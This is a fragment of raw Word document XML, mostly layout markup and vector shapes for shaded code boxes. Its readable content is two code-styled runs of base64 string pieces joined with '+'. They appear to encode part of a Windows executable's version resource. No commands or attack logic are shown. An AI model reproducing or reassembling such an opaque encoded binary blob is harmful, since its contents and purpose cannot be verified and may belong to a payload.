        <w:spacing w:before="0" w:after="0" w:line="163"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114</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"RgBpAGwAZQBJAG4AZgBvAAAAeAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AGwAZQBE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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115</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"AGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>aQBvAG4A"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:827.391pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16547">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16547" coordorigin="10402,0" coordsize="0,16547" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,16,10402,21,10402,26,10402,33,10402,40,10402,48,10402,57,10402,67,10402,78,10402,90,10402,104,10402,119,10402,135,10402,153,10402,172,10402,193,10402,215,10402,239,10402,265,10402,292,10402,321,10402,352,10402,385,10402,421,10402,458,10402,497,10402,538,10402,582,10402,628,10402,676,10402,727,10402,780,10402,836,10402,894,10402,955,10402,1019,10402,1085,10402,1155,10402,1227,10402,1302,10402,1380,10402,1461,10402,1546,10402,1633,10402,1724,10402,1818,10402,1915,10402,2016,10402,2121,10402,2228,10402,2340,10402,2455,10402,2574,10402,2696,10402,2823,10402,2953,10402,3087,10402,3225,10402,3368,10402,3514,10402,3665,10402,3820,10402,3979,10402,4142,10402,4310,10402,4483,10402,4659,10402,4841,10402,5027,10402,5218,10402,5414,10402,5614,10402,5820,10402,6030,10402,6245,10402,6466,10402,6691,10402,6922,10402,7158,10402,7399,10402,7646,10402,7898,10402,8156,10402,8419,10402,8687,10402,8962,10402,9242,10402,9528,10402,9819,10402,10117,10402,10420,10402,10730,10402,11045,10402,11367,10402,11695,10402,12029,10402,12370,10402,12716,10402,13070,10402,13429,10402,13796,10402,14168,10402,14548,10402,14934,10402,15327,10402,15727,10402,16134,10402,16547e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,999l1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:630" coordorigin="1490,1630" coordsize="8990,630" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1660,10484,1661,10484,1662,10484,1664,10484,1665,10484,1667,10484,1669,10484,1671,10484,1673,10484,1675,10484,1677,10484,1679,10484,1681,10484,1684,10484,1686,10484,1689,10484,1692,10484,1694,10484,1697,10484,1701,10484,1704,10484,1707,10484,1711,10484,1714,10484,1718,10484,1722,10484,1726,10484,1730,10484,1734,10484,1738,10484,1743,10484,1748,10484,1752,10484,1757,10484,1762,10484,1768,10484,1773,10484,1779,10484,1784,10484,1790,10484,1796,10484,1803,10484,1809,10484,1816,10484,1822,10484,1829,10484,1836,10484,1844,10484,1851,10484,1859,10484,1867,10484,1875,10484,1883,10484,1891,10484,1900,10484,1909,10484,1918,10484,1927,10484,1936,10484,1946,10484,1955,10484,1966,10484,1976,10484,1986,10484,1997,10484,2008,10484,2019,10484,2030,10484,2042,10484,2054,10484,2066,10484,2078,10484,2090,10484,2103,10484,2116,10484,2129,10484,2143,10484,2156,10484,2170,10484,2185,10484,2199,10484,2214,10484,2229,10484,2244,10484,2259,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10483,2275,10482,2275,10482,2275,10480,2275,10479,2275,10477,2275,10475,2275,10473,2275,10470,2275,10466,2275,10462,2275,10458,2275,10453,2275,10448,2275,10442,2275,10435,2275,10428,2275,10419,2275,10411,2275,10401,2275,10391,2275,10379,2275,10367,2275,10354,2275,10340,2275,10326,2275,10310,2275,10293,2275,10275,2275,10256,2275,10236,2275,10215,2275,10192,2275,10168,2275,10143,2275,10117,2275,10090,2275,10061,2275,10031,2275,9999,2275,9966,2275,9931,2275,9895,2275,9858,2275,9819,2275,9778,2275,9735,2275,9691,2275,9646,2275,9598,2275,9549,2275,9498,2275,9445,2275,9391,2275,9334,2275,9275,2275,9215,2275,9153,2275,9088,2275,9022,2275,8953,2275,8883,2275,8810,2275,8735,2275,8658,2275,8578,2275,8497,2275,8413,2275,8326,2275,8238,2275,8146,2275,8053,2275,7957,2275,7859,2275,7758,2275,7654,2275,7548,2275,7439,2275,7328,2275,7214,2275,7097,2275,6977,2275,6855,2275,6730,2275,6602,2275,6471,2275,6337,2275,6201,2275,6061,2275,5918,2275,5773,2275,5624,2275,5472,2275,5317,2275,5159,2275,4997,2275,4833,2275,4665,2275,4494,2275,4319,2275,4141,2275,3960,2275,3776,2275,3587,2275,3396,2275,3201,2275,3002,2275,2800,2275,2594,2275,2385,2275,2172,2275,1955,2275,1734,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2274,1510,2274,1510,2274,1510,2274,1510,2274,1510,2273,1510,2273,1510,2273,1510,2272,1510,2272,1510,2271,1510,2271,1510,2270,1510,2269,1510,2269,1510,2268,1510,2267,1510,2266,1510,2265,1510,2264,1510,2263,1510,2262,1510,2260,1510,2259,1510,2258,1510,2256,1510,2255,1510,2253,1510,2251,1510,2249,1510,2247,1510,2245,1510,2243,1510,2241,1510,2239,1510,2236,1510,2234,1510,2231,1510,2228,1510,2226,1510,2223,1510,2219,1510,2216,1510,2213,1510,2209,1510,2206,1510,2202,1510,2198,1510,2194,1510,2190,1510,2186,1510,2182,1510,2177,1510,2172,1510,2168,1510,2163,1510,2158,1510,2152,1510,2147,1510,2141,1510,2136,1510,2130,1510,2124,1510,2117,1510,2111,1510,2104,1510,2098,1510,2091,1510,2084,1510,2076,1510,2069,1510,2061,1510,2053,1510,2045,1510,2037,1510,2029,1510,2020,1510,2011,1510,2002,1510,1993,1510,1984,1510,1974,1510,1964,1510,1954,1510,1944,1510,1934,1510,1923,1510,1912,1510,1901,1510,1890,1510,1878,1510,1866,1510,1854,1510,1842,1510,1830,1510,1817,1510,1804,1510,1791,1510,1777,1510,1764,1510,1750,1510,1735,1510,1721,1510,1706,1510,1691,1510,1676,1510,1661,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:1630;width:30;height:650" coordorigin="1490,1630" coordsize="30,650" path="m1517,1645l1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1646,1517,1646,1517,1646,1517,1646,1517,1647,1517,1647,1517,1647,1517,1648,1517,1648,1517,1649,1517,1649,1517,1650,1517,1651,1517,1651,1517,1652,1517,1653,1517,1654,1517,1655,1517,1656,1517,1657,1517,1658,1517,1660,1517,1661,1517,1662,1517,1664,1517,1665,1517,1667,1517,1669,1517,1671,1517,1673,1517,1675,1517,1677,1517,1679,1517,1681,1517,1684,1517,1686,1517,1689,1517,1692,1517,1694,1517,1697,1517,1701,1517,1704,1517,1707,1517,1711,1517,1714,1517,1718,1517,1722,1517,1726,1517,1730,1517,1734,1517,1738,1517,1743,1517,1748,1517,1752,1517,1757,1517,1762,1517,1768,1517,1773,1517,1779,1517,1784,1517,1790,1517,1796,1517,1803,1517,1809,1517,1816,1517,1822,1517,1829,1517,1836,1517,1844,1517,1851,1517,1859,1517,1867,1517,1875,1517,1883,1517,1891,1517,1900,1517,1909,1517,1918,1517,1927,1517,1936,1517,1946,1517,1955,1517,1966,1517,1976,1517,1986,1517,1997,1517,2008,1517,2019,1517,2030,1517,2042,1517,2054,1517,2066,1517,2078,1517,2090,1517,2103,1517,2116,1517,2129,1517,2143,1517,2156,1517,2170,1517,2185,1517,2199,1517,2214,1517,2229,1517,2244,1517,2259,1517,2275e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:112.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2250" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:2250;width:8990;height:670" coordorigin="1490,2250" coordsize="8990,670" path="m1510,2275l1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1511,2275,1512,2275,1512,2275,1514,2275,1515,2275,1517,2275,1519,2275,1521,2275,1524,2275,1528,2275,1532,2275,1536,2275,1541,2275,1546,2275,1552,2275,1559,2275,1566,2275,1575,2275,1583,2275,1593,2275,1603,2275,1615,2275,1627,2275,1640,2275,1654,2275,1668,2275,1684,2275,1701,2275,1719,2275,1738,2275,1758,2275,1780,2275,1802,2275,1826,2275,1851,2275,1877,2275,1904,2275,1933,2275,1963,2275,1995,2275,2028,2275,2063,2275,2099,2275,2136,2275,2175,2275,2216,2275,2259,2275,2303,2275,2348,2275,2396,2275,2445,2275,2496,2275,2549,2275,2604,2275,2660,2275,2719,2275,2779,2275,2841,2275,2906,2275,2972,2275,3041,2275,3112,2275,3184,2275,3259,2275,3336,2275,3416,2275,3498,2275,3582,2275,3668,2275,3757,2275,3848,2275,3941,2275,4037,2275,4136,2275,4236,2275,4340,2275,4446,2275,4555,2275,4666,2275,4780,2275,4897,2275,5017,2275,5139,2275,5264,2275,5392,2275,5523,2275,5657,2275,5793,2275,5933,2275,6076,2275,6222,2275,6370,2275,6522,2275,6677,2275,6835,2275,6997,2275,7161,2275,7329,2275,7500,2275,7675,2275,7853,2275,8034,2275,8219,2275,8407,2275,8598,2275,8793,2275,8992,2275,9194,2275,9400,2275,9609,2275,9823,2275,10039,2275,10260,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2276,10484,2276,10484,2276,10484,2276,10484,2276,10484,2276,10484,2277,10484,2277,10484,2277,10484,2278,10484,2278,10484,2279,10484,2279,10484,2280,10484,2280,10484,2281,10484,2282,10484,2283,10484,2284,10484,2284,10484,2285,10484,2287,10484,2288,10484,2289,10484,2290,10484,2292,10484,2293,10484,2295,10484,2296,10484,2298,10484,2300,10484,2302,10484,2304,10484,2306,10484,2308,10484,2310,10484,2312,10484,2315,10484,2317,10484,2320,10484,2323,10484,2326,10484,2329,10484,2332,10484,2335,10484,2339,10484,2342,10484,2346,10484,2350,10484,2354,10484,2358,10484,2362,10484,2366,10484,2371,10484,2376,10484,2380,10484,2385,10484,2390,10484,2396,10484,2401,10484,2406,10484,2412,10484,2418,10484,2424,10484,2430,10484,2437,10484,2443,10484,2450,10484,2457,10484,2464,10484,2471,10484,2479,10484,2486,10484,2494,10484,2502,10484,2510,10484,2519,10484,2527,10484,2536,10484,2545,10484,2554,10484,2564,10484,2573,10484,2583,10484,2593,10484,2603,10484,2614,10484,2625,10484,2636,10484,2647,10484,2658,10484,2670,10484,2682,10484,2694,10484,2706,10484,2718,10484,2731,10484,2744,10484,2758,10484,2771,10484,2785,10484,2799,10484,2813,10484,2828,10484,2842,10484,2858,10484,2873,10484,2888,10484,2904,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10483,2920,10482,2920,10482,2920,10480,2920,10479,2920,10477,2920,10475,2920,10473,2920,10470,2920,10466,2920,10462,2920,10458,2920,10453,2920,10448,2920,10442,2920,10435,2920,10428,2920,10419,2920,10411,2920,10401,2920,10391,2920,10379,2920,10367,2920,10354,2920,10340,2920,10326,2920,10310,2920,10293,2920,10275,2920,10256,2920,10236,2920,10215,2920,10192,2920,10168,2920,10143,2920,10117,2920,10090,2920,10061,2920,10031,2920,9999,2920,9966,2920,9931,2920,9895,2920,9858,2920,9819,2920,9778,2920,9735,2920,9691,2920,9646,2920,9598,2920,9549,2920,9498,2920,9445,2920,9391,2920,9334,2920,9275,2920,9215,2920,9153,2920,9088,2920,9022,2920,8953,2920,8883,2920,8810,2920,8735,2920,8658,2920,8578,2920,8497,2920,8413,2920,8326,2920,8238,2920,8146,2920,8053,2920,7957,2920,7859,2920,7758,2920,7654,2920,7548,2920,7439,2920,7328,2920,7214,2920,7097,2920,6977,2920,6855,2920,6730,2920,6602,2920,6471,2920,6337,2920,6201,2920,6061,2920,5918,2920,5773,2920,5624,2920,5472,2920,5317,2920,5159,2920,4997,2920,4833,2920,4665,2920,4494,2920,4319,2920,4141,2920,3960,2920,3776,2920,3587,2920,3396,2920,3201,2920,3002,2920,2800,2920,2594,2920,2385,2920,2172,2920,1955,2920,1734,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2919,1510,2919,1510,2919,1510,2919,1510,2918,1510,2918,1510,2917,1510,2917,1510,2916,1510,2916,1510,2915,1510,2914,1510,2914,1510,2913,1510,2912,1510,2911,1510,2910,1510,2909,1510,2908,1510,2907,1510,2905,1510,2904,1510,2903,1510,2901,1510,2899,1510,2898,1510,2896,1510,2894,1510,2892,1510,2890,1510,2888,1510,2886,1510,2883,1510,2881,1510,2878,1510,2875,1510,2873,1510,2870,1510,2867,1510,2863,1510,2860,1510,2857,1510,2853,1510,2850,1510,2846,1510,2842,1510,2838,1510,2834,1510,2829,1510,2825,1510,2820,1510,2815,1510,2810,1510,2805,1510,2800,1510,2795,1510,2789,1510,2783,1510,2778,1510,2771,1510,2765,1510,2759,1510,2752,1510,2746,1510,2739,1510,2732,1510,2724,1510,2717,1510,2709,1510,2702,1510,2693,1510,2685,1510,2677,1510,2668,1510,2660,1510,2651,1510,2641,1510,2632,1510,2622,1510,2612,1510,2602,1510,2592,1510,2582,1510,2571,1510,2560,1510,2549,1510,2538,1510,2526,1510,2514,1510,2502,1510,2490,1510,2477,1510,2464,1510,2451,1510,2438,1510,2425,1510,2411,1510,2397,1510,2382,1510,2368,1510,2353,1510,2338,1510,2323,1510,2307,1510,2291,1510,2275e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:113.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2270" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:2270;width:30;height:650" coordorigin="1490,2270" coordsize="30,650" path="m1517,2275l1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2276,1517,2276,1517,2276,1517,2276,1517,2276,1517,2276,1517,2277,1517,2277,1517,2277,1517,2278,1517,2278,1517,2279,1517,2279,1517,2280,1517,2280,1517,2281,1517,2282,1517,2283,1517,2284,1517,2284,1517,2285,1517,2287,1517,2288,1517,2289,1517,2290,1517,2292,1517,2293,1517,2295,1517,2296,1517,2298,1517,2300,1517,2302,1517,2304,1517,2306,1517,2308,1517,2310,1517,2312,1517,2315,1517,2317,1517,2320,1517,2323,1517,2326,1517,2329,1517,2332,1517,2335,1517,2339,1517,2342,1517,2346,1517,2350,1517,2354,1517,2358,1517,2362,1517,2366,1517,2371,1517,2376,1517,2380,1517,2385,1517,2390,1517,2396,1517,2401,1517,2406,1517,2412,1517,2418,1517,2424,1517,2430,1517,2437,1517,2443,1517,2450,1517,2457,1517,2464,1517,2471,1517,2479,1517,2486,1517,2494,1517,2502,1517,2510,1517,2519,1517,2527,1517,2536,1517,2545,1517,2554,1517,2564,1517,2573,1517,2583,1517,2593,1517,2603,1517,2614,1517,2625,1517,2636,1517,2647,1517,2658,1517,2670,1517,2682,1517,2694,1517,2706,1517,2718,1517,2731,1517,2744,1517,2758,1517,2771,1517,2785,1517,2799,1517,2813,1517,2828,1517,2842,1517,2858,1517,2873,1517,2888,1517,2904,1517,2920e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:145.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2910" coordsize="8990,630">
